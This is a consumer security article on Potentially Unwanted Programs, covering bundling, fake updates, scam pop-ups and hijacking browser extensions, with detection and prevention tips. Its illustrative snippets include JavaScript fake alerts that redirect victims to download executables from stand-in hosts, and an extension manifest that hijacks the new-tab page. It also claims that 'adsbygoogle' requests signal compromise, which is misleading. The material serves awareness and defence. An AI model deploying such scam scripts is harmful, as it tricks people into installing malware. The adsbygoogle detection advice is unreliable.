Protecting yourself from Potentially Unwanted Programs (PUPs)

Table of contents

• What are Potentially Unwanted Programs (PUPs)?
• How do PUPs install themselves on your devices?
• How to detect a Potentially Unwanted Program
• How to protect yourself from Potentially Unwanted Programs

What are Potentially Unwanted Programs (PUPs)?

In the world of cyber security, threats like viruses, malware, and spyware are widely recognized. However, a more subtle and often overlooked danger comes from Potentially Unwanted Programs (PUPs).

These applications are not classified as viruses, but they can degrade system performance, collect data without consent, and modify system settings without the user’s approval.

The term PUPs was coined by security experts to describe software that, while not strictly malicious, is often installed without the user’s full awareness and can be intrusive or even risky.

Common types of PUPs include intrusive toolbars, dubious system optimizers, unwanted browser extensions, and software that injects aggressive advertisements into the system.

How do PUPs install themselves on your devices?

Potentially Unwanted Programs (PUPs) infiltrate devices through deceptive distribution techniques, often exploiting user inattention or lack of awareness.

The most common methods include bundling, fake software updates, misleading pop-ups, and malicious browser extensions. Let’s dive deeper into each of these techniques with real-world examples and practical demonstrations, including code snippets.

1. Bundling: hidden software in installation packages

Bundling is one of the most common ways PUPs spread. Many users download free software without reading the installation options carefully, unknowingly allowing additional unwanted programs to be installed.

Practical Example

Imagine you are installing a free media player, but the installer includes adware and changes your search engine settings by default. A typical bundled installer might look like this:

<installer>

    <program name="MediaPlayerFree" version="1.0">

        <component name="CorePlayer" required="true"/>

        <component name="AdwareToolbar" required="false" selected="true"/>

        <component name="SearchEngineChanger" required="false" selected="true"/>

    </program>

</installer>

In this XML code, AdwareToolbar and SearchEngineChanger are unnecessary programs that are pre-selected. If the user does not manually uncheck them, they get installed without their knowledge.

Real-world examples of software using bundling

• CCleaner (older versions) included additional software in the default installation.
• uTorrent was accused of distributing cryptocurrency miners without user consent.
• Many free software installers from unofficial download sites include Ask Toolbar or Yahoo Toolbar as bundled programs.

2. Fake software updates: the pop-up scam

Many users fall victim to fake software updates, particularly for well-known programs like Adobe Flash Player, Java, or Google Chrome. A compromised website or fraudulent advertisement may display a message like this:

<script>

    alert("Your Flash Player is out of date! Update now to continue.");

    window.location.href = "https://malicious-update.com/flashplayer.exe";

</script>

This script redirects the user to an executable file that installs a PUP or even malware.

Real-world examples of fake updates

• Fake Flash Player updates
  Used to spread adware or cryptocurrency miners.
• Fake Chrome updates
  Some sites display fake notifications urging users to download a “safer” browser version.
• Java update scam
  Fake Java updates trick users into installing spyware.

To avoid these scams, always update software directly from the official website.

3. Misleading pop-ups: fake antivirus and system error warnings

Misleading pop-ups are among the most aggressive methods for distributing PUPs. These messages often mimic system alerts, warning users about non-existent viruses, performance issues, or privacy threats.

Example of a JavaScript scam pop-up

<script>

    function fakeAlert() {

        alert("Your PC is infected! Download our tool to remove threats now.");

        window.location.href = "https://fake-antivirus.com/download.exe";

    }

    setTimeout(fakeAlert, 3000);

</script>

This script simulates a fake alert that prompts users to download a malicious program after a few seconds.

Real-world examples of misleading pop-ups

• Scareware antivirus
  Programs like “PC Optimizer Pro” or “Advanced System Protector” claim to find thousands of issues and ask for payment to “fix” them.
• Fake Microsoft warnings
  Messages pretending to be from Microsoft warn of “critical issues” and suggest calling a support number (Tech Support Scam).
• Fake system error messages
  Often accompanied by alarming sounds to pressure users into taking immediate action.

The best way to stay safe is to avoid clicking on suspicious pop-ups and close the page directly from the task manager if necessary.

4. Malicious browser extensions: hidden threats in your browser

Some PUPs are distributed as browser extensions that modify homepage settings, change the default search engine, and inject intrusive ads.

Example of a malicious Chrome extension

{

    "name": "SuperSearch",

    "version": "1.0",

    "permissions": ["tabs", "webNavigation"],

    "background": {

        "scripts": ["background.js"]

    },

    "chrome_url_overrides": {

        "newtab": "http://fake-search.com"

    }

}

This extension replaces the browser’s new tab page with a fraudulent search engine that redirects users to ad-filled results.

Real-world examples of malicious extensions

• Hola VPN
  Secretly sold users’ bandwidth without permission.
• Search Encrypt
  Claimed to protect privacy but redirected users to ad-heavy search results.
• WebDiscover Browser
  Modified browser settings to inject ads and track user activity.

To stay protected, always install extensions only from the official Chrome Web Store or Mozilla Firefox Add-onsrepository.

How to detect a Potentially Unwanted Program

Detecting a Potentially Unwanted Program (PUP) is not always easy, as these programs are designed to go unnoticed and blend into the system.

However, there are some warning signs that can indicate the presence of a PUP. Let’s explore each symptom with real-world examples and practical methods to identify and remove these programs.

1. Sudden slowdowns in the computer or browser

One of the first signs of a PUP is a noticeable decrease in performance on the system or while browsing the internet. Many PUPs run in the background, consuming resources for cryptocurrency mining, data collection, or injecting ads.

Real-world example: “MyPC Backup” scam

“MyPC Backup” disguised itself as free backup software, but once installed, it slowed down the PC by running background processes and constantly prompting users to upgrade to a paid version.

How to check for resource usage on Windows

If your computer is slowing down unexpectedly, check for unknown programs using excessive resources:

1. Open Task Manager by pressing Ctrl + Shift + Esc.
2. Look at the Processes tab and find programs consuming a lot of CPU or RAM.
3. Search for unfamiliar processes online to see if they are PUPs.

How to check for resource usage on macOS

1. Open “Activity Monitor” (use Spotlight by pressing Cmd + Space).
2. Check for applications using high CPU or RAM.
3. If you see names like “Mac Auto Fixer” or “Advanced Mac Cleaner,” they might be PUPs.

2. Excessive ads and pop-ups while browsing

If you start seeing excessive banner ads and pop-ups while browsing, a PUP may be injecting ads into your browser.

Real-world example: “Superfish” malware on Lenovo laptops

In 2015, some Lenovo laptops were shipped with Superfish, an adware program that altered webpages to inject its own ads without user consent.

How to check if your browser is infected

1. Visit a trusted website, such as Google.
2. If you see suspicious ads or pop-ups, you may have a PUP installed.
3. Try browsing in incognito mode. If ads persist, the issue is system-wide.

Detecting adware via browser console

You can also check for malicious scripts injecting ads into web pages:

1. Open the browser’s developer console by pressing F12 or Ctrl + Shift + I in Chrome/Firefox.
2. Navigate to the Console tab and look for errors or suspicious requests to unknown ad networks.
3. If you find logs mentioning domains like adsbygoogle or superfish.com, your browser is likely compromised.

3. Homepage or search engine changed without permission

Another clear sign of a PUP is an unexpected change in your homepage or search engine settings. This happens when a PUP hijacks the browser to redirect searches through an ad-filled, data-harvesting search engine.

Real-world example: “Search Protect by Conduit”

“Search Protect” claimed to “protect” browser settings but instead forced users to use a fake search engine(search.conduit.com) that collected their data.

How to restore your search engine on Chrome

1. Go to Chrome settings (chrome://settings/).
2. Scroll to Search engine and ensure it’s set to Google or your preferred search engine.
3. If you find an unknown search engine, click Manage search engines and remove it.

4. New toolbars or unknown extensions in the browser

Many PUPs appear as unwanted toolbars or extensions installed in the browser without user consent.

Real-world example: “Ask Toolbar” and “Babylon Toolbar”

Toolbars like Ask.com and Babylon Toolbar were frequently installed via bundling, altering the browser’s settings and adding intrusive ads.

How to remove suspicious extensions in Chrome

1. Type in the address bar: chrome://extensions/.
2. Check the list of installed extensions.
3. Uninstall any unknown or suspicious extensions.

5. Unknown programs launching at system startup

If unknown programs start automatically when you boot your PC, a PUP may have set itself to launch at startup.

Real-world example: “Web Companion” by Lavasoft

“Web Companion” was bundled with some free antivirus programs, modifying browser settings and launching at startup without user consent.

How to check startup programs on Windows

1. Open Task Manager (Ctrl + Shift + Esc).
2. Go to the Startup tab.
3. Look for unknown programs and disable them.

How to check startup programs on macOS

1. Open System Preferences → Users & Groups.
2. Click the Login Items tab and remove unknown startup programs.

How to protect yourself from Potentially Unwanted Programs

Preventing PUPs requires a combination of awareness and good security practices. The first step is being cautious during software installation: avoid clicking “Next” blindly and always check advanced settings to deselect any bundled software.

Using an antivirus with real-time protection is essential, as many security tools—such as Malwarebytes and Windows Defender—can detect and block PUPs before they get installed.

Keeping the operating system and applications up to date also reduces the risk of installing unwanted software. Security updates patch vulnerabilities that could otherwise be exploited to distribute PUPs.

Lastly, users should download software only from official sources and avoid third-party websites, which frequently distribute modified versions of popular programs that contain PUPs.

Conclusion

Potentially Unwanted Programs are a subtle yet serious threat that can compromise both security and system performance. While they are not always classified as malware, they can cause significant issues such as slowdowns, unauthorized system changes, and increased exposure to security risks.

Understanding how PUPs spread, learning to recognize them, and taking proper preventive measures are crucial steps to ensuring a safe and hassle-free digital experience.

Questions and answers

1. What are PUPs?
   Potentially Unwanted Programs are software that gets installed without clear user consent, often causing slowdowns or modifying system settings.
2. Are PUPs viruses?
   No, PUPs are not viruses, but they can be harmful by altering system performance and collecting data without permission.
3. How do PUPs install themselves?
   PUPs are primarily spread through bundling, fake software updates, and misleading pop-ups that trick users into installing them.
4. How can I tell if I have a PUP on my PC?
   Signs of a PUP include slowdowns, excessive ads, altered browser settings, and unknown extensions or programs.
5. How do I remove a PUP?
   You can manually uninstall it through the Control Panel or use an antivirus with PUP detection capabilities.
6. How can I prevent installing PUPs?
   Avoid downloading software from untrusted sites, carefully read installation options, and use an updated antivirus.
7. Can a PUP steal my personal data?
   Some PUPs track browsing habits or collect user data, which can pose privacy risks.
8. Are there tools to detect and remove PUPs?
   Yes, programs like Malwarebytes, AdwCleaner, and Windows Defender effectively detect and eliminate PUPs.
9. Can PUPs infect smartphones and tablets?
   Yes, PUPs exist for Android and iOS, often distributed through suspicious apps from unofficial sources.
10. Can a PUP reinstall itself?
    Some PUPs have persistence mechanisms, making it necessary to remove them using specialized security software.